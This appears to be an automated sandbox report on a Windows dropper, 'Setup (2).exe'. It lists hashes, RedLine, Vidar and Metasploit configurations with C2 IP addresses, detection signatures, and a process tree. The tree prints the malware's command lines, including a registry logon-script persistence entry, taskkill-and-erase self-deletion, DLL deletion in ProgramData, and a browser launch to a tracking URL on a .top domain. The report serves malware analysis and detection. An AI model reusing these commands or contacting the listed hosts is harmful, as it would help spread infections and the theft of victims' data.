Resubmissions

15-10-2024 15:36

241015-s1zlzasdkc 10

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

Analysis

  • max time kernel
    149s
  • max time network
    1832s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (2).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

205.185.119.191:18846

193.38.55.57:7575

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

40.1

Botnet

517

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    517

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 29 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Themida packer 13 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Users\Admin\Documents\zRuFkI2PELZkCfoUm68Wiz16.exe
      "C:\Users\Admin\Documents\zRuFkI2PELZkCfoUm68Wiz16.exe"
      2⤵
      • Executes dropped EXE
      PID:868
    • C:\Users\Admin\Documents\OOBDcGbFIWr9jTEUPELkHZfc.exe
      "C:\Users\Admin\Documents\OOBDcGbFIWr9jTEUPELkHZfc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:928
      • C:\Users\Admin\AppData\Roaming\2946390.exe
        "C:\Users\Admin\AppData\Roaming\2946390.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2144
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2144 -s 1724
          4⤵
          • Program crash
          PID:1296
      • C:\Users\Admin\AppData\Roaming\6016514.exe
        "C:\Users\Admin\AppData\Roaming\6016514.exe"
        3⤵
        • Executes dropped EXE
        PID:2236
    • C:\Users\Admin\Documents\p5m240H2wh0t_hz3wdpefqRD.exe
      "C:\Users\Admin\Documents\p5m240H2wh0t_hz3wdpefqRD.exe"
      2⤵
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:968
    • C:\Users\Admin\Documents\RoBHCQN1q76aHqAC3N4fW0Rz.exe
      "C:\Users\Admin\Documents\RoBHCQN1q76aHqAC3N4fW0Rz.exe"
      2⤵
      • Executes dropped EXE
      PID:1636
    • C:\Users\Admin\Documents\HkKDSgSdSL5fOFnmlIfbzyuJ.exe
      "C:\Users\Admin\Documents\HkKDSgSdSL5fOFnmlIfbzyuJ.exe"
      2⤵
      • Executes dropped EXE
      PID:1464
    • C:\Users\Admin\Documents\RBmnadoJa6ZU4LhYCMN4I5bK.exe
      "C:\Users\Admin\Documents\RBmnadoJa6ZU4LhYCMN4I5bK.exe"
      2⤵
      • Executes dropped EXE
      PID:1728
    • C:\Users\Admin\Documents\2nugkF8QuMxxCmOSaRpzJRqJ.exe
      "C:\Users\Admin\Documents\2nugkF8QuMxxCmOSaRpzJRqJ.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:884
    • C:\Users\Admin\Documents\6soblcd2g4B0xXkysZL776yr.exe
      "C:\Users\Admin\Documents\6soblcd2g4B0xXkysZL776yr.exe"
      2⤵
      • Executes dropped EXE
      PID:1564
    • C:\Users\Admin\Documents\NlAtWuQXcH0wIgfBEjmZ436i.exe
      "C:\Users\Admin\Documents\NlAtWuQXcH0wIgfBEjmZ436i.exe"
      2⤵
        PID:940
      • C:\Users\Admin\Documents\5P85JjLDK7vIsHtEMlLFdRaH.exe
        "C:\Users\Admin\Documents\5P85JjLDK7vIsHtEMlLFdRaH.exe"
        2⤵
        • Executes dropped EXE
        PID:1012
        • C:\Users\Admin\Documents\5P85JjLDK7vIsHtEMlLFdRaH.exe
          C:\Users\Admin\Documents\5P85JjLDK7vIsHtEMlLFdRaH.exe
          3⤵
            PID:2856
        • C:\Users\Admin\Documents\znz2iPOEyvOyTDRCdVZVQFGN.exe
          "C:\Users\Admin\Documents\znz2iPOEyvOyTDRCdVZVQFGN.exe"
          2⤵
          • Executes dropped EXE
          PID:1848
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 1332
            3⤵
            • Program crash
            PID:2396
        • C:\Users\Admin\Documents\m6dlfLqtdhvHctmAzTl4785H.exe
          "C:\Users\Admin\Documents\m6dlfLqtdhvHctmAzTl4785H.exe"
          2⤵
          • Executes dropped EXE
          PID:556
          • C:\Users\Admin\Documents\m6dlfLqtdhvHctmAzTl4785H.exe
            "C:\Users\Admin\Documents\m6dlfLqtdhvHctmAzTl4785H.exe"
            3⤵
              PID:2524
          • C:\Users\Admin\Documents\4k6eTgGclXQQ0RKkmV3xji9g.exe
            "C:\Users\Admin\Documents\4k6eTgGclXQQ0RKkmV3xji9g.exe"
            2⤵
            • Executes dropped EXE
            PID:1556
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im "4k6eTgGclXQQ0RKkmV3xji9g.exe" /f & erase "C:\Users\Admin\Documents\4k6eTgGclXQQ0RKkmV3xji9g.exe" & exit
              3⤵
                PID:2712
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "4k6eTgGclXQQ0RKkmV3xji9g.exe" /f
                  4⤵
                  • Kills process with taskkill
                  PID:920
            • C:\Users\Admin\Documents\aG6BGr78YGuMnEYMQQhczbif.exe
              "C:\Users\Admin\Documents\aG6BGr78YGuMnEYMQQhczbif.exe"
              2⤵
              • Executes dropped EXE
              PID:1068
            • C:\Users\Admin\Documents\QTYWoOLSsbzvmuIXroFtpkw9.exe
              "C:\Users\Admin\Documents\QTYWoOLSsbzvmuIXroFtpkw9.exe"
              2⤵
              • Executes dropped EXE
              PID:1640
              • C:\Users\Admin\Documents\QTYWoOLSsbzvmuIXroFtpkw9.exe
                "C:\Users\Admin\Documents\QTYWoOLSsbzvmuIXroFtpkw9.exe" -q
                3⤵
                • Executes dropped EXE
                PID:2316
            • C:\Users\Admin\Documents\3QhDoMIJZf35AfVBvQViHhOO.exe
              "C:\Users\Admin\Documents\3QhDoMIJZf35AfVBvQViHhOO.exe"
              2⤵
              • Executes dropped EXE
              PID:1944
            • C:\Users\Admin\Documents\4ntOs89JI7m8x5PtQAiMRLvK.exe
              "C:\Users\Admin\Documents\4ntOs89JI7m8x5PtQAiMRLvK.exe"
              2⤵
                PID:2068
              • C:\Users\Admin\Documents\KbNWRXz_A_Ro_yeVH57MIotY.exe
                "C:\Users\Admin\Documents\KbNWRXz_A_Ro_yeVH57MIotY.exe"
                2⤵
                • Executes dropped EXE
                PID:680
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "KbNWRXz_A_Ro_yeVH57MIotY.exe" /f & erase "C:\Users\Admin\Documents\KbNWRXz_A_Ro_yeVH57MIotY.exe" & exit
                  3⤵
                    PID:1216
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "KbNWRXz_A_Ro_yeVH57MIotY.exe" /f
                      4⤵
                      • Kills process with taskkill
                      PID:844
                • C:\Users\Admin\Documents\mbk9hAgrDJDFgCxaYhMtrtrX.exe
                  "C:\Users\Admin\Documents\mbk9hAgrDJDFgCxaYhMtrtrX.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:564
                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                    3⤵
                      PID:2568
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        4⤵
                          PID:2832
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          4⤵
                            PID:3036
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            4⤵
                              PID:2304
                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                            3⤵
                              PID:2600
                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                              3⤵
                                PID:2632
                            • C:\Users\Admin\Documents\HtOe1cofcMz9L1ugmzouXRwr.exe
                              "C:\Users\Admin\Documents\HtOe1cofcMz9L1ugmzouXRwr.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2196
                              • C:\Users\Admin\AppData\Local\Temp\is-QG27L.tmp\HtOe1cofcMz9L1ugmzouXRwr.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-QG27L.tmp\HtOe1cofcMz9L1ugmzouXRwr.tmp" /SL5="$60204,138429,56832,C:\Users\Admin\Documents\HtOe1cofcMz9L1ugmzouXRwr.exe"
                                3⤵
                                  PID:2660
                                  • C:\Users\Admin\AppData\Local\Temp\is-JI6E6.tmp\Setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-JI6E6.tmp\Setup.exe" /Verysilent
                                    4⤵
                                      PID:2856
                                      • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                        5⤵
                                          PID:2748
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im LGCH2-401_2021-08-18_14-40.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe" & del C:\ProgramData\*.dll & exit
                                            6⤵
                                              PID:3812
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im LGCH2-401_2021-08-18_14-40.exe /f
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3568
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:4064
                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                            5⤵
                                              PID:2416
                                              • C:\Users\Admin\AppData\Local\Temp\is-8QDNC.tmp\Inlog.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-8QDNC.tmp\Inlog.tmp" /SL5="$10290,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                6⤵
                                                  PID:2684
                                                  • C:\Users\Admin\AppData\Local\Temp\is-C8NGF.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-C8NGF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                    7⤵
                                                      PID:1536
                                                      • C:\Users\Admin\AppData\Local\Temp\is-KI6KG.tmp\Setup.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-KI6KG.tmp\Setup.tmp" /SL5="$20290,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-C8NGF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                        8⤵
                                                          PID:3636
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-SC107.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                            9⤵
                                                              PID:1016
                                                              • C:\Windows\SysWOW64\expand.exe
                                                                expand C:\Users\Admin\AppData\Local\Temp\is-SC107.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                10⤵
                                                                  PID:3092
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                9⤵
                                                                  PID:1352
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                    10⤵
                                                                      PID:3980
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-SC107.tmp\{app}\vdi_compiler.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-SC107.tmp\{app}\vdi_compiler"
                                                                    9⤵
                                                                      PID:3812
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SC107.tmp\{app}\vdi_compiler.exe"
                                                                        10⤵
                                                                          PID:3180
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                        9⤵
                                                                          PID:3492
                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
                                                                            10⤵
                                                                              PID:2336
                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2336 CREDAT:275457 /prefetch:2
                                                                                11⤵
                                                                                  PID:1644
                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2336 CREDAT:537609 /prefetch:2
                                                                                  11⤵
                                                                                    PID:4328
                                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                9⤵
                                                                                  PID:3568
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                          5⤵
                                                                            PID:1592
                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281057 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                              6⤵
                                                                                PID:3432
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                              5⤵
                                                                                PID:868
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                5⤵
                                                                                  PID:2368
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                  5⤵
                                                                                    PID:2344
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                      6⤵
                                                                                        PID:3976
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                      5⤵
                                                                                        PID:1604
                                                                                        • C:\Users\Admin\Documents\ubiZcxlh1JJ_1LAF6Crb4TGn.exe
                                                                                          "C:\Users\Admin\Documents\ubiZcxlh1JJ_1LAF6Crb4TGn.exe"
                                                                                          6⤵
                                                                                            PID:3220
                                                                                          • C:\Users\Admin\Documents\0FhtecyVS3azdqnApBZgbfet.exe
                                                                                            "C:\Users\Admin\Documents\0FhtecyVS3azdqnApBZgbfet.exe"
                                                                                            6⤵
                                                                                              PID:3384
                                                                                            • C:\Users\Admin\Documents\998XvD0jxYVD1hjTCzWj60YJ.exe
                                                                                              "C:\Users\Admin\Documents\998XvD0jxYVD1hjTCzWj60YJ.exe"
                                                                                              6⤵
                                                                                                PID:3428
                                                                                              • C:\Users\Admin\Documents\P8vqthGT5Vij2XuN_5kht_nG.exe
                                                                                                "C:\Users\Admin\Documents\P8vqthGT5Vij2XuN_5kht_nG.exe"
                                                                                                6⤵
                                                                                                  PID:3472
                                                                                                • C:\Users\Admin\Documents\R3gYPg14aIG6BKMKnzKlYVTL.exe
                                                                                                  "C:\Users\Admin\Documents\R3gYPg14aIG6BKMKnzKlYVTL.exe"
                                                                                                  6⤵
                                                                                                    PID:3532
                                                                                                  • C:\Users\Admin\Documents\pJjvbtO7zkgPcOrjlejaSKq9.exe
                                                                                                    "C:\Users\Admin\Documents\pJjvbtO7zkgPcOrjlejaSKq9.exe"
                                                                                                    6⤵
                                                                                                      PID:3576
                                                                                                    • C:\Users\Admin\Documents\7KredWMvi2FgEy_jnXWAdBSd.exe
                                                                                                      "C:\Users\Admin\Documents\7KredWMvi2FgEy_jnXWAdBSd.exe"
                                                                                                      6⤵
                                                                                                        PID:3524
                                                                                                      • C:\Users\Admin\Documents\o3AhRsxpiHkGr7S9lbSCJHQG.exe
                                                                                                        "C:\Users\Admin\Documents\o3AhRsxpiHkGr7S9lbSCJHQG.exe"
                                                                                                        6⤵
                                                                                                          PID:3396
                                                                                                        • C:\Users\Admin\Documents\aY40PipeIR76QoiTjcxtNm_R.exe
                                                                                                          "C:\Users\Admin\Documents\aY40PipeIR76QoiTjcxtNm_R.exe"
                                                                                                          6⤵
                                                                                                            PID:3372
                                                                                                            • C:\Users\Admin\Documents\aY40PipeIR76QoiTjcxtNm_R.exe
                                                                                                              C:\Users\Admin\Documents\aY40PipeIR76QoiTjcxtNm_R.exe
                                                                                                              7⤵
                                                                                                                PID:3248
                                                                                                            • C:\Users\Admin\Documents\UWmgwflv2aOkkts6yUmGZgGR.exe
                                                                                                              "C:\Users\Admin\Documents\UWmgwflv2aOkkts6yUmGZgGR.exe"
                                                                                                              6⤵
                                                                                                                PID:3352
                                                                                                              • C:\Users\Admin\Documents\Kk8I9vaQgCc0iYh0Ik2dsh4R.exe
                                                                                                                "C:\Users\Admin\Documents\Kk8I9vaQgCc0iYh0Ik2dsh4R.exe"
                                                                                                                6⤵
                                                                                                                  PID:3780
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-M7FAV.tmp\Kk8I9vaQgCc0iYh0Ik2dsh4R.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-M7FAV.tmp\Kk8I9vaQgCc0iYh0Ik2dsh4R.tmp" /SL5="$1032E,138429,56832,C:\Users\Admin\Documents\Kk8I9vaQgCc0iYh0Ik2dsh4R.exe"
                                                                                                                    7⤵
                                                                                                                      PID:2620
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-8DL65.tmp\Setup.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-8DL65.tmp\Setup.exe" /Verysilent
                                                                                                                        8⤵
                                                                                                                          PID:2952
                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                            9⤵
                                                                                                                              PID:2080
                                                                                                                      • C:\Users\Admin\Documents\TWjojuhp2O3dZTG9hTgxuz25.exe
                                                                                                                        "C:\Users\Admin\Documents\TWjojuhp2O3dZTG9hTgxuz25.exe"
                                                                                                                        6⤵
                                                                                                                          PID:3344
                                                                                                                        • C:\Users\Admin\Documents\UNr4uGIx0IsHWMcb790IHc_U.exe
                                                                                                                          "C:\Users\Admin\Documents\UNr4uGIx0IsHWMcb790IHc_U.exe"
                                                                                                                          6⤵
                                                                                                                            PID:3308
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 892
                                                                                                                              7⤵
                                                                                                                              • Program crash
                                                                                                                              PID:1324
                                                                                                                          • C:\Users\Admin\Documents\8reucYJdQNGqxMuyZtuzSman.exe
                                                                                                                            "C:\Users\Admin\Documents\8reucYJdQNGqxMuyZtuzSman.exe"
                                                                                                                            6⤵
                                                                                                                              PID:3296
                                                                                                                              • C:\Users\Admin\AppData\Roaming\1887742.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\1887742.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:3932
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 3932 -s 824
                                                                                                                                    8⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:3548
                                                                                                                                • C:\Users\Admin\AppData\Roaming\4452025.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4452025.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:3148
                                                                                                                                • C:\Users\Admin\Documents\p1zl8gcrum2jQqGegEz0ebXw.exe
                                                                                                                                  "C:\Users\Admin\Documents\p1zl8gcrum2jQqGegEz0ebXw.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:3288
                                                                                                                                    • C:\Users\Admin\Documents\p1zl8gcrum2jQqGegEz0ebXw.exe
                                                                                                                                      "C:\Users\Admin\Documents\p1zl8gcrum2jQqGegEz0ebXw.exe" -q
                                                                                                                                      7⤵
                                                                                                                                        PID:3184
                                                                                                                                    • C:\Users\Admin\Documents\9TvSPmH2CyGFvVYepzmBQ6SV.exe
                                                                                                                                      "C:\Users\Admin\Documents\9TvSPmH2CyGFvVYepzmBQ6SV.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:3212
                                                                                                                                      • C:\Users\Admin\Documents\0W5SzzlV0vTf6hHKzGBR6Tzz.exe
                                                                                                                                        "C:\Users\Admin\Documents\0W5SzzlV0vTf6hHKzGBR6Tzz.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:3204
                                                                                                                                        • C:\Users\Admin\Documents\C18xpsTdxf_LmCaXV3Drn_nU.exe
                                                                                                                                          "C:\Users\Admin\Documents\C18xpsTdxf_LmCaXV3Drn_nU.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:3196
                                                                                                                                          • C:\Users\Admin\Documents\r_aPLb8I1lkgRguemJYaEjV0.exe
                                                                                                                                            "C:\Users\Admin\Documents\r_aPLb8I1lkgRguemJYaEjV0.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:3188
                                                                                                                                              • C:\Users\Admin\Documents\r_aPLb8I1lkgRguemJYaEjV0.exe
                                                                                                                                                C:\Users\Admin\Documents\r_aPLb8I1lkgRguemJYaEjV0.exe
                                                                                                                                                7⤵
                                                                                                                                                  PID:2464
                                                                                                                                              • C:\Users\Admin\Documents\o7Z3U1e1Co3LZgHpaGP5Z6LL.exe
                                                                                                                                                "C:\Users\Admin\Documents\o7Z3U1e1Co3LZgHpaGP5Z6LL.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:3176
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:1440
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:516
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2687145.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2687145.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:108
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8235415.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8235415.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:364
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:3716
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1744062.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1744062.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2036
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5651606.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5651606.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:1808
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2152
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1652
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:3772
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:1668
                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2212
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\711B.exe
